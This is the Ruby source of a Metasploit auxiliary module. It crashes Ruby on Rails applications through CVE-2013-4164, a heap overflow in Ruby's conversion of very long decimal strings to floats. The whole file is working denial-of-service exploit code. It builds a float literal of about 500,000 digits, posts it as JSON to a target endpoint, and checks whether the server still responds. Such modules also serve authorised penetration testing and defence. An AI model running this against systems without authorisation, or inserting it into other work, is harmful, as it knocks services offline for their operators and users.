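##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for CVE-2013-4164 (Ruby heap-based buffer overflow while
# converting a very long decimal string to a Float), reached through a Rails
# application's JSON request parser.
#
# Flow of +run+:
#   1. send a JSON array holding a single, roughly 500,000-digit float literal;
#   2. probe the same endpoint with a harmless body and report whether the
#      application still answers.
#
# NOTE(review): the verdict is a heuristic. The probe is sent immediately after
# the malicious body, so a server that is merely slow to parse the oversized
# number (and times out) is reported the same way as one that segfaulted.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  # Target length of the fractional part of the crafted float. The repeating
  # digit pattern is tiled until it reaches (approximately) this many digits.
  FRACTIONAL_DIGITS = 500_000

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Ruby on Rails JSON Processor Floating Point Heap Overflow DoS',
      'Description' => %q{
        When Ruby attempts to convert a string representation of a large floating point
        decimal number to its floating point equivalent, a heap-based buffer overflow
        can be triggered. This module has been tested successfully on a Ruby on Rails application
        using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application
        crashes with a segfault error. Other versions of Ruby are reported to be affected.
      },
      'Author' =>
        [
          'Charlie Somerville', # original discoverer
          'joev', # bash PoC
          'todb', # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2013-4164' ],
          [ 'OSVDB', '100113' ],
          [ 'URL', 'https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/' ]
        ],
      'DisclosureDate' => '2013-11-22'))
    register_options(
      [
        OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/']),
        OptString.new('HTTPVERB', [false, 'The HTTP verb to use', 'POST'])
      ])
  end

  # Normalized request path built from the TARGETURI option.
  def uri
    normalize_uri(target_uri.path.to_s)
  end

  # HTTP method used for both the DoS request and the availability probe;
  # defaults to POST when HTTPVERB is unset.
  def verb
    datastore['HTTPVERB'] || 'POST'
  end

  # Random one- to four-digit string, memoized so that every caller (the log
  # line, the payload, the multiplier) sees the same pattern for this run.
  def digit_pattern
    @digit_pattern ||= rand(10_000).to_s
  end

  # Digits placed before the decimal point.
  def integer_part
    digit_pattern
  end

  # Number of times the pattern is repeated to fill the fractional part.
  # digit_pattern is 1..4 characters long, so integer division here gives the
  # same count as the former floating-point computation.
  def multiplier
    FRACTIONAL_DIGITS / digit_pattern.size
  end

  # Digits placed after the decimal point: the pattern tiled +multiplier+ times.
  def fractional_part
    digit_pattern * multiplier
  end

  # The crafted float literal, "<pattern>.<pattern repeated>".
  #
  # The original author observed that the value seems to need a repeating
  # element: plain random digit strings of the same length did not appear to
  # trigger the crash in their tests, whereas a repeated pattern did, and it is
  # slightly better than a static "1.1111..." string.
  # NOTE(review): earlier comments spoke of ~300,000 digits; the code as
  # written produces about FRACTIONAL_DIGITS (500,000) fractional digits.
  def evil_float_string
    [integer_part, fractional_part].join('.')
  end

  # Send the malicious JSON body, then probe the target once more and print the
  # verdict. Returns nil; all results are reported through print_* calls.
  def run
    print_status "Using digit pattern of #{digit_pattern} taken to #{multiplier} places"
    sploit = "[#{evil_float_string}]"
    print_status "Sending DoS HTTP#{datastore['SSL'] ? 'S' : ''} #{verb} request to #{uri}"

    # Nothing to assess if the target could not be reached in the first place.
    return unless send_dos_request(sploit)

    print_status "Checking availability"
    print_error "Target is still responsive, DoS was unsuccessful." if target_responsive?
  end

  private

  # Deliver the crafted body.
  #
  # Returns false when the target could not be reached at all (refused,
  # unreachable, timed out), true otherwise. A connection that is reset or
  # closed while the request is in flight is deliberately *not* treated as
  # unreachable: a server that crashes while parsing the body drops the socket
  # at exactly this point, so the availability probe must still run instead of
  # the exception escaping from run.
  def send_dos_request(body)
    send_json(body)
    true
  rescue ::Rex::ConnectionRefused
    print_error "Unable to connect. (Connection refused)"
    false
  rescue ::Rex::HostUnreachable
    print_error "Unable to connect. (Host unreachable)"
    false
  rescue ::Rex::ConnectionTimeout
    print_error "Unable to connect. (Timeout)"
    false
  rescue ::Errno::ECONNRESET, ::Errno::EPIPE => e
    print_status "Connection dropped while sending the DoS request (#{e.class}); checking whether the target survived"
    true
  end

  # Probe the endpoint with a short random JSON string.
  #
  # Returns true when the target still answers with a non-empty body. Returns
  # false, after reporting success, when the request fails at the connection
  # level or the response carries no body. The reported reason names the actual
  # exception class rather than always claiming "Host unreachable".
  def target_responsive?
    res = send_json(Rex::Text.rand_text_alpha(1 + rand(64)).to_json)
    if res && res.body && !res.body.empty?
      true
    else
      print_good "#{peer}#{uri} - DoS appears successful (No useful response from host)"
      false
    end
  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EPIPE => e
    print_good "DoS appears successful (#{e.class})"
    false
  end

  # One JSON request to the configured URI using the configured verb.
  def send_json(body)
    send_request_cgi(
      'method' => verb,
      'uri' => uri,
      'ctype' => 'application/json',
      'data' => body
    )
  end
end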